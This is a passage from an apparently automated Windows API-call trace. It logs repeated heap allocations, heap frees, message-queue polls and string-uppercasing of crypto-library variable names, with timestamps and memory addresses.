(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0157.269] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0157.269] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0157.271] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0157.271] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0157.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0157.271] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0157.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0157.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0157.272] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0157.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0157.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0157.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0157.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0157.418] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0157.418] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.418] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0157.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0157.419] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0157.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0157.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0157.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0157.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0157.421] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0157.421] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0157.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0157.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0157.421] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0157.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0157.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0157.423] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0157.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0157.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0157.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0157.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0157.424] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0157.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0157.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0157.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0157.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0157.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0157.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 